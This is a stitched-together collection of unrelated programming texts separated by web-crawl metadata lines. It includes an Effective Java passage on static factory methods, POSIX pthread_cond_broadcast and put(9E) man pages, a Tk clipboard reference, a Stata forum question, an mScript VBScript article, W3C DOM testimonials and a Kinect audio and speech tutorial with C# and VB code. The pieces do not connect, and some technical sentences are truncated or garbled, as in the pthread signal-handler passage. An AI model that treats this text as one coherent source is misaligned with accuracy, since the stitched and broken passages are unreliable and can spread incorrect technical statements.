A second disadvantage of static factory methods is that they are not readily distinguishable from other static methods. They do not stand out in API documentation in the way that constructors do, so it can be difficult to figure out how to instantiate a class that provides static factory methods instead of constructors. The Javadoc tool may someday draw attention to static factory methods. In the meantime, you can reduce this disadvantage by drawing attention to static factories in class or interface comments, and by adhering to common naming conventions. Here are some common names for static factory methods:

valueOf -- Returns an instance that has, loosely speaking, the same value as its parameters. Such static factories are effectively type-conversion methods.
of -- A concise alternative to valueOf, popularized by EnumSet (Item 32).

getInstance -- Returns an instance that is described by the parameters but cannot be said to have the same value. In the case of a singleton, getInstance takes no parameters and returns the sole instance.

newInstance -- Like getInstance, except that newInstance guarantees that each instance returned is distinct from all others.

getType -- Like getInstance, but used when the factory method is in a different class. Type indicates the type of object returned by the factory method.

newType -- Like newInstance, but used when the factory method is in a different class. Type indicates the type of object returned by the factory method.

In summary, static factory methods and public constructors both have their uses, and it pays to understand their relative merits. Often static factories are preferable, so avoid the reflex to provide public constructors without first considering static factories.
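To make the service provider sketch from earlier concrete, here is a hypothetical client exercising it. The Service, Provider, and Services types are reproduced in minimal form from the sketch; the anonymous default provider and its "default" name are invented for this example:

```java
// Hypothetical client of the service provider framework sketch.
// The types are reduced to a minimum so the example is self-contained.
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

interface Service { String name(); }          // service interface

interface Provider { Service newService(); }  // service provider interface

class Services {
    private Services() { }  // Prevents instantiation

    private static final Map<String, Provider> providers =
        new ConcurrentHashMap<String, Provider>();
    public static final String DEFAULT_PROVIDER_NAME = "<def>";

    // Provider registration API
    public static void registerDefaultProvider(Provider p) {
        registerProvider(DEFAULT_PROVIDER_NAME, p);
    }
    public static void registerProvider(String name, Provider p) {
        providers.put(name, p);
    }

    // Service access API
    public static Service newInstance() {
        return newInstance(DEFAULT_PROVIDER_NAME);
    }
    public static Service newInstance(String name) {
        Provider p = providers.get(name);
        if (p == null)
            throw new IllegalArgumentException(
                "No provider registered with name: " + name);
        return p.newService();
    }
}

public class ServicesDemo {
    public static void main(String[] args) {
        // A provider registers itself; in a full framework this is often
        // done reflectively by class name, as the text describes.
        Services.registerDefaultProvider(new Provider() {
            public Service newService() {
                return new Service() {
                    public String name() { return "default"; }
                };
            }
        });
        // The client obtains a service without naming the implementation
        // class anywhere in its own code.
        Service s = Services.newInstance();
        System.out.println(s.name()); // prints "default"
    }
}
```

Note that the client above depends only on the Service interface and the Services access API; swapping in a different provider requires no client changes.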
http://www.drdobbs.com/architecture-and-design/creating-and-destroying-java-objects-par/208403883?pgno=1
CC-MAIN-2015-35
en
refinedweb
#include <pthread.h>

int pthread_cond_broadcast(pthread_cond_t *cond);
int pthread_cond_signal(pthread_cond_t *cond);

These functions shall unblock threads blocked on a condition variable. The pthread_cond_broadcast() function shall unblock all threads currently blocked on the specified condition variable cond. The pthread_cond_signal() function shall unblock at least one of the threads that are blocked on the specified condition variable cond (if any threads are blocked on cond).

If more than one thread is blocked on a condition variable, the scheduling policy shall determine the order in which threads are unblocked. When each thread unblocked as a result of a pthread_cond_broadcast() or pthread_cond_signal() returns from its call to pthread_cond_wait() or pthread_cond_timedwait(), the thread shall own the mutex with which it called pthread_cond_wait() or pthread_cond_timedwait(). The thread(s) that are unblocked shall contend for the mutex according to the scheduling policy (if applicable), and as if each had called pthread_mutex_lock().

The pthread_cond_broadcast() or pthread_cond_signal() functions may be called by a thread whether or not it currently owns the mutex that threads calling pthread_cond_wait() or pthread_cond_timedwait() have associated with the condition variable during their waits; however, if predictable scheduling behavior is required, then that mutex shall be locked by the thread calling pthread_cond_broadcast() or pthread_cond_signal().

The pthread_cond_broadcast() and pthread_cond_signal() functions shall have no effect if there are no threads currently blocked on cond.

In addition, pthread_cond_broadcast() makes it easier to implement a read-write lock. The pthread_cond_broadcast() function is needed in order to wake up all waiting readers when a writer releases its lock. Finally, the two-phase commit algorithm can use this broadcast function to notify all clients of an impending transaction commit.
It is not safe to use the pthread_cond_signal() function in a signal handler that is invoked asynchronously. Even if it were safe, there would still be a race between the test of the Boolean pthread_cond_wait() that could not be efficiently eliminated. Mutexes and condition variables are thus not suitable for releasing a waiting thread by signaling from code running in a signal handler.

On a multi-processor, it may be impossible for an implementation of pthread_cond_signal() to avoid the unblocking of more than one thread blocked on a condition variable. For example, consider the following partial implementation of pthread_cond_wait() and pthread_cond_signal(), executed by two threads in the order given. One thread is trying to wait on the condition variable, another is concurrently executing pthread_cond_signal(), while a third thread is already waiting.

pthread_cond_wait(mutex, cond):
    value = cond->value;                    /* 1 */
    pthread_mutex_unlock(mutex);            /* 2 */
    pthread_mutex_lock(cond->mutex);        /* 10 */
    if (value == cond->value) {             /* 11 */
        me->next_cond = cond->waiter;
        cond->waiter = me;
        pthread_mutex_unlock(cond->mutex);
        unable_to_run(me);
    } else
        pthread_mutex_unlock(cond->mutex);  /* 12 */
    pthread_mutex_lock(mutex);              /* 13 */

pthread_cond_signal(cond):
    pthread_mutex_lock(cond->mutex);        /* 3 */
    cond->value++;                          /* 4 */
    if (cond->waiter) {                     /* 5 */
        sleeper = cond->waiter;             /* 6 */
        cond->waiter = sleeper->next_cond;  /* 7 */
        able_to_run(sleeper);               /* 8 */
    }
    pthread_mutex_unlock(cond->mutex);      /* 9 */
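The same guidance carries over to Java's java.util.concurrent.locks.Condition, whose signal() and signalAll() play the roles of pthread_cond_signal() and pthread_cond_broadcast(). Below is a minimal sketch (the Latch class is invented for this example): because await() can return spuriously, just as pthread_cond_wait() can, waiters re-test the predicate in a loop, and the signaler holds the lock while signaling, matching the "predictable scheduling behavior" advice above.

```java
// Sketch of the POSIX condition-variable guidance using Java's Condition.
// Latch and its field names are invented for this example.
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;

public class Latch {
    private final Lock lock = new ReentrantLock();
    private final Condition opened = lock.newCondition();
    private boolean open = false;   // the Boolean predicate

    public void awaitOpen() throws InterruptedException {
        lock.lock();
        try {
            while (!open)           // re-test after every wakeup
                opened.await();     // analog of pthread_cond_wait()
        } finally {
            lock.unlock();
        }
    }

    public void open() {
        lock.lock();                // hold the lock while signaling
        try {
            open = true;
            opened.signalAll();     // analog of pthread_cond_broadcast()
        } finally {
            lock.unlock();
        }
    }

    public static void main(String[] args) throws InterruptedException {
        final Latch latch = new Latch();
        Thread waiter = new Thread(new Runnable() {
            public void run() {
                try {
                    latch.awaitOpen();
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                }
            }
        });
        waiter.start();
        latch.open();
        waiter.join();  // returns once the waiter has been released
        System.out.println("released");
    }
}
```

Whether the waiter blocks before open() runs or arrives afterward, the predicate loop guarantees it only proceeds once open is true.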
http://www.makelinux.net/man/3posix/P/pthread_cond_broadcast
Importing an Excel file directly from an https URL

Is it possible to import an Excel file directly into Stata from a secure (https) URL? Per , the following routine works perfectly for the first, unsecure URL, but the second -copy- gives an "unknown network protocol" (r671) error:

tempfile raw
copy "http://[URL]" `raw'
import excel `raw'
copy "https://[URL]" `raw', replace
import excel `raw'

Many thanks for any assistance.
http://www.stata.com/statalist/archive/2013-04/msg01193.html
Tk_ClipboardClear, Tk_ClipboardAppend - Manage the clipboard

#include <tk.h>

int Tk_ClipboardClear(interp, tkwin)

int Tk_ClipboardAppend(interp, tkwin, target, format, buffer)

interp: Interpreter to use for reporting errors.
tkwin: Window that determines which display's clipboard to manipulate.
target: Conversion type for this clipboard item; has same meaning as target argument to Tk_CreateSelHandler.
format: Representation to use when data is retrieved; has same meaning as format argument to Tk_CreateSelHandler.
buffer: Null terminated string containing the data to be appended to the clipboard.

Tk_ClipboardClear may invoke callbacks as a result of losing the CLIPBOARD selection, so any calling function should take care to be reentrant at the point Tk_ClipboardClear is invoked.

append, clipboard, clear, format, type
http://search.cpan.org/~ni-s/Tk-804.027/pod/pTk/Clipboard.pod
mScript is a .NET class that allows you to dynamically script portions of your code using VBScript. You can pass multiple variables to your script, do any necessary processing, and return multiple variables from the script.

After adding a reference to the mScriptable.dll assembly, you can use/import the namespace:

using mScriptable;

You can then begin by creating an instance of the mScript class found in the mScriptable namespace.

mScript script = new mScript();

Next, you need to supply the variables your script will need access to.

script.addScriptInput("foo", "Hello");
script.addScriptInput("bar", "World");
script.addScriptInput("x", 100);
script.addScriptInput("y", 13);

And also assign your script code to the script object.

string myScriptCode = "...";
script.setScript(myScriptCode);

Your script code must be valid VBScript. Any error in the script will be caught by the Windows Scripting Host and not the control. Currently, the return value from the Windows Scripting Host process is not being monitored to determine if a script completed successfully, so it's important to catch your own errors.

Your VBScript can retrieve the values supplied to it using either a provided inpVal(varName) function, or an abbreviated wrapper function iv(varName). Values can be returned to the .NET caller using a provided return varName, varVal subroutine. A sample script might look like the following:

return "hwString", iv("foo") & " " & iv("bar")
return "calc1", iv("x") + iv("y")
return "calc2", iv("x") * iv("y")

You can execute your script code using the runScript() method of the mScript object. This method will return a Hashtable containing all of your script's return values.

Hashtable rValues = script.runScript();

Upon completion of the script, the runScript() method will return a Hashtable containing the script's return values.
In the case of our example, your Hashtable would have the following keys:

hwString
calc1
calc2

Back in your .NET application, you can then retrieve these values using the Hashtable.

string returned = "";
foreach (string rVar in rValues.Keys)
{
    returned += rVar + " = " + rValues[rVar] + "\r\n";
}
MessageBox.Show(returned);

That's pretty much all there is to it. The supplied demo project shows a working example of the class in use, allowing you to supply the inputs, modify the VBScript, execute, and then view the outputs.

mScriptable relies on the Windows Scripting Host for its VBScript functionality. As such, with each call to runScript(), you incur the overhead of starting a Windows Scripting Host process. The communication between the .NET component and the scripting host is fairly crude, but workable. For each run, a new file (called [timestamp].vbs) is created. This file includes your provided code as well as some header code that provides the basic variable value retrieval and value return functionality as well as file I/O. Each call your script makes to the return subroutine spools a tab delimited name/value pair out to another file called [timestamp].txt. When the script exits, the .NET module reads the values from this file and makes them available in a Hashtable. After the script completes and the values are retrieved, both the .vbs and .txt files are removed.

At user request, mScriptable has been modified so it can now run a user's standalone scripts. If you want to use a VBScript directly with WSH and also via a .NET application using mScriptable, you now can. The change you'll need to make to your script is to supply your own standalone versions of the inpVal(), iv(), and return() routines. To prevent duplicate declarations of functions/subroutines in the VBScript code, mScriptable will remove any user defined functions/subroutines named inpVal(), iv(), or return().
A sample VBScript that can run standalone as well as via mScriptable might look like the following:

' My function to allow script to run via WSH directly
Function iv(myVariable)
    Dim retVal
    Select Case myVariable
        Case "foo"
            retVal = "John"
        Case "bar"
            retVal = "Doe"
        Case "x"
            retVal = 9
        Case "y"
            retVal = 3
        Case Else
            retVal = ""
    End Select
    iv = retVal
End Function

Sub return(varName, varVal)
    ' this is just a dummy function
    MsgBox varName & " = " & varVal
End Sub

When executed via the WSH directly, this script would run as you would expect. When loaded and run via mScriptable, the iv() function and the return() subroutine will be removed and replaced with mScriptable's own code that supplies the script inputs.
http://www.codeproject.com/Articles/15741/Scripting-NET-applications-with-VBScript
IBM is delighted to see the Document Object Model Level 2 become an official W3C Recommendation. This new version includes important new features, such as Namespaces, which will enable programmers to better exploit XML for e-business applications. IBM feels it is very important to ensure that there are high quality, open source reference implementations of the DOM standard available. We have made significant contributions to the Apache Xerces parser which already supports DOM Level 2. IBM will continue to contribute to the DOM activity in the W3C as it evolves. -- Bob Sutor, Director for e-business Standards Strategy, IBM As the Web continues to evolve, the value of a core set of DOM features grows ever more important. Those core features provide content and application developers alike with a common programming model across a variety of languages and applications, which has been a direct contributor to the success of XML. As co-editor of the DOM Level 2 Style Specification, Microsoft has made contributions to the development of the DOM, and hopes to do so in the future. -- David Turner, Product Manager and Technical Evangelist, XML Technologies, Microsoft Netscape is strongly committed to supporting the W3C DOM Level 2 and other web standards because they are the foundation for next-generation web applications. The DOM Level 2 Core support for advanced XML features such as namespaces sets the stage for supporting emerging XML-based technologies. The CSS Interfaces will enable applications to dynamically reformat content from scripting languages such as JavaScript, and the event model enables the creation of web applications with user interfaces that are as rich and interactive as native applications but that run across platforms and devices. 
Netscape will continue to work within the W3C to define innovative standards such as the DOM Level 2 and through the open source development initiative at mozilla.org to support these standards in the Mozilla browser and products based upon it such as Netscape 6. -- Jim Hamerly, Vice-President of Client Product Development, Netscape Communications Corporation Nexgenix is delighted to contribute to the DOM development. DOM helps developers to create Web applications that take advantage of the wealth of components and data available on the Web by providing a standard interface that enables many hardware and software platforms to talk to each other smoothly. -- Dr. Shlomit Ritz Finkelstein, Director of Research, Nexgenix, Inc. With DOM Level 2, internet developers can now use the flexibility of XML to make web content fully interoperable across multiple platforms and multiple languages. The support of DOM Level 2 in the Oracle XML Developer's Kit for Java is essential for delivering the new generation of web sites where content has to be dynamic and exchangeable. -- Chuck Rozwat, Executive Vice President, Server Technologies, Oracle Corporation The DOM is an extremely important W3C Recommendation, and Level 2 adds to the basic functionality defined in Level 1. XMetaL 2.0, our award-winning XML editor, supports the Level 1 XML DOM and we have found it to be very useful in allowing the integration with other DOM-supporting products, such as repositories, databases, and B2B systems. We intend to implement DOM Level 2 functionality in our products in the future. -- Lauren Wood, Director of Product Technology, SoftQuad Software Inc.
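As a small illustration of the namespace support these testimonials highlight, the DOM Level 2 Core methods createElementNS() and getNamespaceURI() are exposed by Java's standard org.w3c.dom API. The namespace URI and element name below are invented for this sketch:

```java
// Sketch: building a namespaced element with the DOM Level 2 Core API
// as exposed by the JDK (javax.xml.parsers + org.w3c.dom).
// The namespace URI and "ord:order" element name are invented.
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class DomNamespaces {
    public static void main(String[] args) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true);  // required for Level 2 namespace methods
        Document doc = dbf.newDocumentBuilder().newDocument();

        // DOM Level 2: create an element bound to a namespace URI
        Element order = doc.createElementNS(
            "http://example.com/ns/orders", "ord:order");
        doc.appendChild(order);

        System.out.println(order.getNamespaceURI()); // the URI above
        System.out.println(order.getLocalName());    // prints "order"
        System.out.println(order.getPrefix());       // prints "ord"
    }
}
```

Because the same interfaces are standardized across languages, the equivalent calls exist in ECMAScript and other DOM bindings, which is the cross-platform interoperability the quotes above describe.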
http://www.w3.org/2000/11/dom-level2-testimonial
Audio Fundamentals (Beta 2 SDK) - Posted: Jun 16, 2011

This video covers capturing audio data from the Kinect microphone array, a demo adapted from the built-in audio recorder. The video also covers speech recognition using Kinect.

We'll use a Slider and two Button controls, and we'll also use some stack panels to be sure everything lines up nicely:

XAML

<Window x:
  <Grid>
    <StackPanel>
      <StackPanel Orientation="Horizontal">
        <Label Content="Seconds to Record: " />
        <Label Content="{Binding ElementName=RecordForTimeSpan, Path=Value}" />
      </StackPanel>
      <Slider Name="RecordForTimeSpan" Minimum="1" Maximum="25" IsSnapToTickEnabled="True" />
      <StackPanel Orientation="Horizontal" HorizontalAlignment="Center">
        <Button Content="Record" Height="50" Width="100" Name="RecordButton" />
        <Button Content="Play" Height="50" Width="100" Name="PlayButton" />
      </StackPanel>
      <MediaElement Name="audioPlayer" />
    </StackPanel>
  </Grid>
</Window>

For each button, we'll want to create a click event. Go to the properties window (F4), select the RecordButton, select the Events tab, and double click on the Click event to create the RecordButton_Click event. Do the same for the Play button so we have the PlayButton_Click event wired up as well.

The first task is to add in the Kinect Audio library:

C#

using Microsoft.Research.Kinect.Audio;

Visual Basic

Imports Microsoft.Research.Kinect.Audio

There are two ways we can record audio. You can record audio synchronously, meaning that the UI thread will in effect be "frozen" while we record audio using it. Alternatively, you can record audio on a separate thread so that the UI thread remains responsive to events while the recording happens in parallel. Our sample includes both methods so you can choose which one is required for your application.
We’ll build variables to hold the amount of time we’ll record, the file name of the recording, and to enable asynchronous recording, we’ll use the FinishedRecording event to notify the UI thread that we're done recording:

C#

double _amountOfTimeToRecord;
string _lastRecordedFileName;
private event RoutedEventHandler FinishedRecording;

Visual Basic

Private _amountOfTimeToRecord As Double
Private _lastRecordedFileName As String
Private Event FinishedRecording As RoutedEventHandler

Next we’ll create the RecordAudio method that will do the actual audio recording.

C#

private void RecordAudio()
{
}

Visual Basic

Private Sub RecordAudio()
End Sub

To create threads, we'll add in the System.Threading namespace:

C#

using System.Threading;

Visual Basic

Imports System.Threading

Now we'll create the thread and do some simple end-user management in the RecordButton_Click event. First we'll disable the two buttons, record the audio, and create a unique file name. Then we have the option of calling the RecordAudio method either synchronously or asynchronously as shown below:

C#

private void RecordButton_Click(object sender, RoutedEventArgs e)
{
    RecordButton.IsEnabled = false;
    PlayButton.IsEnabled = false;
    _amountOfTimeToRecord = RecordForTimeSpan.Value;
    _lastRecordedFileName = DateTime.Now.ToString("yyyyMMddHHmmss") + "_wav.wav";
    var t = new Thread(new ThreadStart(RecordAudio));
    t.SetApartmentState(ApartmentState.MTA);
    t.Start();
}

Visual Basic

Private Sub RecordButton_Click(ByVal sender As Object, ByVal e As RoutedEventArgs)
    RecordButton.IsEnabled = False
    PlayButton.IsEnabled = False
    _amountOfTimeToRecord = RecordForTimeSpan.Value
    _lastRecordedFileName = Date.Now.ToString("yyyyMMddHHmmss") & "_wav.wav"
    Dim t = New Thread(New ThreadStart(AddressOf RecordAudio))
    t.SetApartmentState(ApartmentState.MTA)
    t.Start()
End Sub

From here, this sample and the built-in sample are pretty much the same.
We'll only add three differences: the FinishedRecording event, a dynamic playback time, and the dynamic file name. Note that the WriteWavHeader function is the exact same as the one in the built-in demo as well. Since we leverage different types of streams, we'll add the System.IO namespace:

C#

using System.IO;

Visual Basic

Imports System.IO

The entire RecordAudio method:

C#

private void RecordAudio()
{
    using (var source = new KinectAudioSource())
    {
        var recordingLength = (int) _amountOfTimeToRecord * 2 * 16000;
        var buffer = new byte[1024];
        source.SystemMode = SystemMode.OptibeamArrayOnly;
        using (var fileStream = new FileStream(_lastRecordedFileName, FileMode.Create))
        {
            WriteWavHeader(fileStream, recordingLength);
            //Start capturing audio
            using (var audioStream = source.Start())
            {
                //Simply copy the data from the stream down to the file
                int count, totalCount = 0;
                while ((count = audioStream.Read(buffer, 0, buffer.Length)) > 0 && totalCount < recordingLength)
                {
                    fileStream.Write(buffer, 0, count);
                    totalCount += count;
                }
            }
        }
        if (FinishedRecording != null)
            FinishedRecording(null, null);
    }
}

Visual Basic

Private Sub RecordAudio()
    Using source = New KinectAudioSource
        Dim recordingLength = CInt(Fix(_amountOfTimeToRecord)) * 2 * 16000
        Dim buffer = New Byte(1023) {}
        source.SystemMode = SystemMode.OptibeamArrayOnly
        Using fileStream = New FileStream(_lastRecordedFileName, FileMode.Create)
            WriteWavHeader(fileStream, recordingLength)
            'Start capturing audio
            Using audioStream = source.Start()
                'Simply copy the data from the stream down to the file
                Dim count As Integer, totalCount As Integer = 0
                count = audioStream.Read(buffer, 0, buffer.Length)
                Do While count > 0 AndAlso totalCount < recordingLength
                    fileStream.Write(buffer, 0, count)
                    totalCount += count
                    count = audioStream.Read(buffer, 0, buffer.Length)
                Loop
            End Using
        End Using
        RaiseEvent FinishedRecording(Nothing, Nothing)
    End Using
End Sub

So we've recorded the audio, saved it, and fired off an event that said we're done—let's hook
into it. We'll wire up that event in the MainWindow constructor:

C#

public MainWindow()
{
    InitializeComponent();
    FinishedRecording += new RoutedEventHandler(MainWindow_FinishedRecording);
}

Visual Basic

Public Sub New()
    InitializeComponent()
    AddHandler FinishedRecording, AddressOf MainWindow_FinishedRecording
End Sub

Since that event will return on a non-UI thread, we'll need to use the Dispatcher to get us back on a UI thread so we can reenable those buttons:

C#

void MainWindow_FinishedRecording(object sender, RoutedEventArgs e)
{
    Dispatcher.BeginInvoke(new ThreadStart(ReenableButtons));
}

private void ReenableButtons()
{
    RecordButton.IsEnabled = true;
    PlayButton.IsEnabled = true;
}

Visual Basic

Private Sub MainWindow_FinishedRecording(sender As Object, e As RoutedEventArgs)
    Dispatcher.BeginInvoke(New ThreadStart(AddressOf ReenableButtons))
End Sub

Private Sub ReenableButtons()
    RecordButton.IsEnabled = True
    PlayButton.IsEnabled = True
End Sub

And finally, we'll make the Media element play back the audio we just saved!
We'll also verify both that the file exists and that the user recorded some audio:

C#

private void PlayButton_Click(object sender, RoutedEventArgs e)
{
    if (!string.IsNullOrEmpty(_lastRecordedFileName) && File.Exists(_lastRecordedFileName))
    {
        audioPlayer.Source = new Uri(_lastRecordedFileName, UriKind.RelativeOrAbsolute);
        audioPlayer.LoadedBehavior = MediaState.Play;
        audioPlayer.UnloadedBehavior = MediaState.Close;
    }
}

Visual Basic

Private Sub PlayButton_Click(sender As Object, e As RoutedEventArgs)
    If (Not String.IsNullOrEmpty(_lastRecordedFileName)) AndAlso File.Exists(_lastRecordedFileName) Then
        audioPlayer.Source = New Uri(_lastRecordedFileName, UriKind.RelativeOrAbsolute)
        audioPlayer.LoadedBehavior = MediaState.Play
        audioPlayer.UnloadedBehavior = MediaState.Close
    End If
End Sub

To do speech recognition, we need to bring in the speech recognition namespaces from the speech SDK:

C#

using Microsoft.Speech.AudioFormat;
using Microsoft.Speech.Recognition;

Visual Basic

Imports Microsoft.Speech.AudioFormat
Imports Microsoft.Speech.Recognition

In VB, we'll also need to add an MTA attribute to Sub Main; C# does not need this.
Visual Basic

<MTAThread()> _
Shared Sub Main(ByVal args() As String)

Next, we need to set up the KinectAudioSource in a way that's compatible with speech recognition:

C#

using (var source = new KinectAudioSource())
{
    source.FeatureMode = true;
    source.AutomaticGainControl = false; //Important to turn this off for speech recognition
    source.SystemMode = SystemMode.OptibeamArrayOnly; //No AEC for this sample
}

Visual Basic

Using source = New KinectAudioSource
    source.FeatureMode = True
    source.AutomaticGainControl = False 'Important to turn this off for speech recognition
    source.SystemMode = SystemMode.OptibeamArrayOnly 'No AEC for this sample
End Using

With that in place, we can initialize the SpeechRecognitionEngine to use the Kinect recognizer, which was downloaded earlier:

C#

private const string RecognizerId = "SR_MS_en-US_Kinect_10.0";
RecognizerInfo ri = SpeechRecognitionEngine.InstalledRecognizers().Where(r => r.Id == RecognizerId).FirstOrDefault();

Visual Basic

Private Const RecognizerId As String = "SR_MS_en-US_Kinect_10.0"
Dim ri As RecognizerInfo = SpeechRecognitionEngine.InstalledRecognizers().Where(Function(r) r.Id = RecognizerId).FirstOrDefault()

Next, a "grammar" needs to be set up, which specifies which words the speech recognition engine should listen for. The following code creates a grammar for the words "red", "blue" and "green".

C#

using (var sre = new SpeechRecognitionEngine(ri.Id))
{
    var colors = new Choices();
    colors.Add("red");
    colors.Add("green");
    colors.Add("blue");
    var gb = new GrammarBuilder();
    //Specify the culture to match the recognizer in case we are running in a different culture.
    gb.Culture = ri.Culture;
    gb.Append(colors);
    // Create the actual Grammar instance, and then load it into the speech recognizer.
    var g = new Grammar(gb);
    sre.LoadGrammar(g);
}

Visual Basic

Using sre = New SpeechRecognitionEngine(ri.Id)
    Dim colors = New Choices
    colors.Add("red")
    colors.Add("green")
    colors.Add("blue")
    Dim gb = New GrammarBuilder
    'Specify the culture to match the recognizer in case we are running in a different culture
    gb.Culture = ri.Culture
    gb.Append(colors)
    ' Create the actual Grammar instance, and then load it into the speech recognizer.
    Dim g = New Grammar(gb)
    sre.LoadGrammar(g)
End Using

Next, several events are hooked up so you can be notified when a word is recognized, hypothesized, or rejected:

C#

sre.SpeechRecognized += SreSpeechRecognized;
sre.SpeechHypothesized += SreSpeechHypothesized;
sre.SpeechRecognitionRejected += SreSpeechRecognitionRejected;

Visual Basic

AddHandler sre.SpeechRecognized, AddressOf SreSpeechRecognized
AddHandler sre.SpeechHypothesized, AddressOf SreSpeechHypothesized
AddHandler sre.SpeechRecognitionRejected, AddressOf SreSpeechRecognitionRejected

Finally, the audio stream source from the Kinect is applied to the speech recognition engine:

C#

using (Stream s = source.Start())
{
    sre.SetInputToAudioStream(s, new SpeechAudioFormatInfo(
        EncodingFormat.Pcm, 16000, 16, 1, 32000, 2, null));
    Console.WriteLine("Recognizing. Say: 'red', 'green' or 'blue'. Press ENTER to stop");
    sre.RecognizeAsync(RecognizeMode.Multiple);
    Console.ReadLine();
    Console.WriteLine("Stopping recognizer ...");
    sre.RecognizeAsyncStop();
}

Visual Basic

Using s As Stream = source.Start()
    sre.SetInputToAudioStream(s, New SpeechAudioFormatInfo(EncodingFormat.Pcm, 16000, 16, 1, 32000, 2, Nothing))
    Console.WriteLine("Recognizing. Say: 'red', 'green' or 'blue'. Press ENTER to stop")
    sre.RecognizeAsync(RecognizeMode.Multiple)
    Console.ReadLine()
    Console.WriteLine("Stopping recognizer ...")
    sre.RecognizeAsyncStop()
End Using

The event handlers specified earlier display information based on the result of the user's speech being recognized:

C#

static void SreSpeechRecognitionRejected(object sender, SpeechRecognitionRejectedEventArgs e)
{
    Console.WriteLine("\nSpeech Rejected");
    if (e.Result != null)
        DumpRecordedAudio(e.Result.Audio);
}

static void SreSpeechHypothesized(object sender, SpeechHypothesizedEventArgs e)
{
    Console.Write("\rSpeech Hypothesized: \t{0}\tConf:\t{1}", e.Result.Text, e.Result.Confidence);
}

static void SreSpeechRecognized(object sender, SpeechRecognizedEventArgs e)
{
    Console.WriteLine("\nSpeech Recognized: \t{0}", e.Result.Text);
}

private static void DumpRecordedAudio(RecognizedAudio audio)
{
    if (audio == null) return;
    int fileId = 0;
    string filename;
    while (File.Exists((filename = "RetainedAudio_" + fileId + ".wav")))
        fileId++;
    Console.WriteLine("\nWriting file: {0}", filename);
    using (var file = new FileStream(filename, System.IO.FileMode.CreateNew))
        audio.WriteToWaveStream(file);
}

Visual Basic

Private Shared Sub SreSpeechRecognitionRejected(ByVal sender As Object, ByVal e As SpeechRecognitionRejectedEventArgs)
    Console.WriteLine(vbLf & "Speech Rejected")
    If e.Result IsNot Nothing Then
        DumpRecordedAudio(e.Result.Audio)
    End If
End Sub

Private Shared Sub SreSpeechHypothesized(ByVal sender As Object, ByVal e As SpeechHypothesizedEventArgs)
    Console.Write(vbCr & "Speech Hypothesized: " & vbTab & "{0}" & vbTab & "Conf:" & vbTab & "{1}", e.Result.Text, e.Result.Confidence)
End Sub

Private Shared Sub SreSpeechRecognized(ByVal sender As Object, ByVal e As SpeechRecognizedEventArgs)
    Console.WriteLine(vbLf & "Speech Recognized: " & vbTab & "{0}", e.Result.Text)
End Sub

Private Shared Sub DumpRecordedAudio(ByVal audio As RecognizedAudio)
    If audio Is Nothing Then
        Return
    End If
    Dim fileId As Integer = 0
    Dim filename As String
    filename = "RetainedAudio_" & fileId & ".wav"
    Do While File.Exists(filename)
        fileId += 1
        filename = "RetainedAudio_" & fileId & ".wav"
    Loop
    Console.WriteLine(vbLf & "Writing file: {0}", filename)
    Using file = New FileStream(filename, System.IO.FileMode.CreateNew)
        audio.WriteToWaveStream(file)
    End Using
End Sub

In the case of a word being rejected, the audio is written out to a WAV file so it can be listened to later. We've created an application that can record audio for a variable amount of time!

Great! But how about other languages? Like German, French oder Spanish? Are these supported?

How about a brief code sample of how general dictation might be used? When I try to modify the sample code to add gb.AddDictation(), it crashes on sre.LoadGrammar(g). I've searched high and low for a solution but it appears this is a general issue (that the dictation stuff doesn't work) with the speech API, so why is it there? Any help is much appreciated. Thanks

typo: visaul -> visual

@George Birbilis: fixed the typo

@TheZar: are you using the x86 or x64 speech APIs?

Very good the tutorial but, do you have the code for Speech Recognition? Thanks

Is there any good resource out there for learning the SRGS XML format? The W3C specification is too.. specificationy, and all the tutorials I've found so far deal with the BNF format rather than the XML format.

Hi, thanks for sharing us such a good tutorial. But I personally find it is not so difficult to record streaming audio from microphone by standalone audio recorders, not built-in ones.

Hi, I'm trying to get both speech recognition and Text to speech to work on a WPF app (C#). I have the Recognition down but the synthesizer part keeps giving an error of "No voice installed on the system or none available with the current security setting."
I have both "Microsoft Speech Platform - Software Development Kit (SDK) (Version 10.2)" and "Microsoft Speech Platform - Server Runtime (Version 10.2)" in X86 and X64 installed on my system. Can anyone tell me what's wrong? I would really really appreciate it. Thanks, Hiva

I am trying to add speech recognition to a WPF C# app. I am receiving video, skeletal, and depth data correctly, but whenever I start capturing the audio I receive the exception error below. I can run the demo above correctly. Is there a reference or an extra step needed when using WPF?

System.InvalidCastException was unhandled
Message=Unable to cast COM object of type 'System.__ComObject' to interface type 'Microsoft.Research.Kinect.Audio.IMediaObject'. This operation failed because the QueryInterface call on the COM component for the interface with IID '{D8AD0F58-5494-4102-97C5-EC798E59BCF4}' failed due to the following error: No such interface supported (Exception from HRESULT: 0x80004002 (E_NOINTERFACE)).
Source=mscorlib
StackTrace:
InnerException:

For some reason i only have the Microsoft Lightweight Speech Recognizer v11.0 (SR_MS_ZXX_Lightweight_v11.0) showing up as an available speech recognizer. I've double-checked that i have everything installed correctly, and i'm referencing the C:\Program Files\Microsoft SDKs\Speech\v11.0\Assembly\Microsoft.Speech.dll. Any ideas why i don't see the Kinect Recognizer?
https://channel9.msdn.com/Series/KinectSDKQuickstarts/Audio-Fundamentals?format=flash
put(9E) - receive messages from the preceding queue

#include <sys/types.h>
#include <sys/stream.h>
#include <sys/stropts.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>

int prefixrput(queue_t *q, mblk_t *mp); /* read side */
int prefixwput(queue_t *q, mblk_t *mp); /* write side */

INTERFACE LEVEL
Architecture independent level 1 (DDI/DKI). This entry point is required for STREAMS.

PARAMETERS
q - Pointer to the queue(9S) structure.
mp - Pointer to the message block.

DESCRIPTION
The primary task of the put() routine is to coordinate the passing of messages from one queue to the next in a stream. The put() routine is called by the preceding stream component (stream module, driver, or stream head). put() routines are designated "write" or "read" depending on the direction of message flow. With few exceptions, a STREAMS module or driver must have a put() routine. One exception is the read side of a driver, which does not need a put() routine because there is no component downstream to call it. The put() routine is always called before the component's corresponding srv(9E) (service) routine, and so put() should be used for the immediate processing of messages.

